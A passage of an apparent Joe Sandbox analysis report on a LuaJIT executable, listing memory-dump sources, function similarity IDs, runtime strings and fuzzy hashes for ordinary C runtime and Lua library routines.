                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: type_info::_name_internal_method
                                                      • String ID: builtin#$false$nil$true
                                                      • API String ID: 3713626258-3570738779
                                                      • Opcode ID: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction ID: 1c22a215694f1f42494fd7c6226cf938b73390c10d53cacc2d7bd5466e317ec9
                                                      • Opcode Fuzzy Hash: 23cbb804629e43a59d8109324ffad1fa43563c5d8df94d050893fcdc2b640b46
                                                      • Instruction Fuzzy Hash: 9B61162661CB4585EB209B1DE48012DB7A0F799BA9F905332EB9D877F8CF7CD1508B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                      • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                      • API String ID: 1341846612-1452030528
                                                      • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction ID: 47a7c14a88e23d126da349cc1ae73ff28d97f7b9a4961ff5c900494dab5e2835
                                                      • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                      • Instruction Fuzzy Hash: 2F318A21A2CA4281FB64B719D4553BED390AFE6399FC04039FF4D466DDDEACE1008720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock_mbsncpy_s
                                                      • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                      • API String ID: 1937151238-4005544233
                                                      • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction ID: 45a9308cb8fc517d804997fd55ce77fdb7d07ce5d05edc46e7d0d063b052b487
                                                      • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction Fuzzy Hash: C0218561518A8581DB20BB69D8501ABE350FBD63A9F805335FBAD476DDCEECD500C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction ID: 2c1dfb2f573b339693ab349da79886877b548799df241e3f6f176b9c765a27a7
                                                      • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction Fuzzy Hash: 52F05461F2974282EB446B58D484374A360EFA578FFC81035E65F4556CCFACD448C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1EBCE26
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3,?,?,FFFFFFFE,00007FF7B1EBD196), ref: 00007FF7B1EBCEE4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7B1EBCDA3,?,?,FFFFFFFE,00007FF7B1EBD196), ref: 00007FF7B1EBCF6E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2210144848-0
                                                      • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction ID: 7b06fc315b377b1d73bb8186002e23726c6bb5fbd8e40c5e8de7996e329d3ba2
                                                      • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction Fuzzy Hash: 73819722A1864285F710FB6984802BDA7A1BF6679EFC44235FF0E53699DFBCA441C330
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction ID: 087d32ee3ffdcb1ae43dde55b08f30701d05307a236053eb5409545bc6335d66
                                                      • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction Fuzzy Hash: 4551F32290898685E762EF3CA89037BD210BF6375EF948335FB5D1E5D8DFBCA4818610
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction ID: 3206ea8d958ae5cf784d26395f5baf5b1a5d9b556431ad832c6dc5a253a3cafb
                                                      • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction Fuzzy Hash: E3117C26E18A2701F754B37CA4D237BD0406F6636AF980332F76E4E2DEDE9C68408220
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID:
                                                      • API String ID: 667068680-0
                                                      • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction ID: 8171558b05e84f1e87fc23ba691182d2ce67007e2fa37e5a5ed69e4034b8b217
                                                      • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction Fuzzy Hash: 7B01ED7260CA81C1D764AB18F86432AA7B0FB997DAF544135EBCD4266CCF7CD554CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction ID: 10579e44a05b6d5e0737ba74a2068988d01c911da3f0766d9aeac3d089fa2476
                                                      • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction Fuzzy Hash: 1581A232D0C24285F765EB2C81C427AEB91BB37B4EFD85235E70DC619DCAEDA8019761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction ID: e48ae6c3961f9094dbcd2ffa11ed4bcb68edfc285386a0695f7077d063676015
                                                      • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction Fuzzy Hash: 0581747290C34686E764AF2D804807DB7A0EF27B8EF948037DB494629DDFBAE441C725
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$sinh
                                                      • API String ID: 1156100317-1232919748
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: Unwind__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 2208346422-629598281
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$acos
                                                      • API String ID: 1156100317-2870037509
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$asin
                                                      • API String ID: 1156100317-2188059690
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                      • API String ID: 2882679554-1241789697
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_get_daylight
                                                      • String ID:
                                                      • API String ID: 72036449-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3461063567-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 2321548817-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: e+000$gfff
                                                      • API String ID: 3215553584-3030954782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$fmod
                                                      • API String ID: 1757819995-3213614193
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID: $$type parameter
                                                      • API String ID: 3764944385-1705267328
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$pow
                                                      • API String ID: 1757819995-713443511
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _set_errno_from_matherr
                                                      • String ID: tanh
                                                      • API String ID: 1187470696-874243715
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: CompareStringtry_get_function
                                                      • String ID: CompareStringEx
                                                      • API String ID: 3328479835-2590796910
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: DateFormattry_get_function
                                                      • String ID: GetDateFormatEx
                                                      • API String ID: 595753042-159735388
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: FormatTimetry_get_function
                                                      • String ID: GetTimeFormatEx
                                                      • API String ID: 3261793192-1692793031
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction ID: 6af9b5085211dc5b9f3ad4a4456e4116ca94231b38750f7b55c31b87ab5e5d68
                                                      • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction Fuzzy Hash: C6118F36608B81C2EB509F19E400269B7E0FB99B99F984234EF8D07B58DF7CD451CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$sqrt
                                                      • API String ID: 1757819995-799759792
                                                      • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction ID: 2b65b02c5b4456c3b4121979e28030353428256e8a53dac02645e03416bbd9a8
                                                      • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction Fuzzy Hash: 63119876D18B8586DB01DF19958032BA661BFA77E4F508335FB6C1A6CCEF6CE0419A00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$exp
                                                      • API String ID: 1757819995-2878093337
                                                      • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction ID: 82ff8ae288dd408688e2ecae0190c30eac96ecbf3d69fbf88677001509dc9105
                                                      • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction Fuzzy Hash: 5E01CC36928B8887E320DF24D0451ABB760FFEA349F605315F7441A674CBBDD0819B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage_free_nolock
                                                      • String ID: system error %d
                                                      • API String ID: 3491801694-1688351658
                                                      • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction ID: 93de4037fcfcccce1b09bb99b9ce698dccd1811262139ba6121a4d4f3e1287b6
                                                      • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction Fuzzy Hash: 92010432A18682C6E720AB55F45576AB3A0FB96789FD04035EB8D47A5DDF7CD4048B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: DefaultUsertry_get_function
                                                      • String ID: GetUserDefaultLocaleName
                                                      • API String ID: 3217810228-151340334
                                                      • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction ID: 77c60ea3741c9620f8b3f998927ff0376d08bfda87d9094d9f65b03a468fe7ae
                                                      • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction Fuzzy Hash: 45F0E951B0854281EB04B79DB6C05B9D291AF5EBCAFC84139FB0D0765DCEACD4448360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9AF9
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF7B1EBD7C2,?,?,00000000,00007FF7B1EBD6BA,?,?,?,00007FF7B1EAB0BD), ref: 00007FF7B1EB9B13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 539475747-3084827643
                                                      • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction ID: b9201119b51c603e1f8a3a4ff427688d5e68d18e40f8dfa7207ca2a8c53c829f
                                                      • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction Fuzzy Hash: 66F05E21B18B51C2EB14AB99F4804AAA260FF5ABC9FC85135FB1E03B5DCFBCD4558760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9851
                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01,?,?,?,?,00007FF7B1EC02A3), ref: 00007FF7B1EB9868
                                                      Strings
                                                      Memory Dump Source
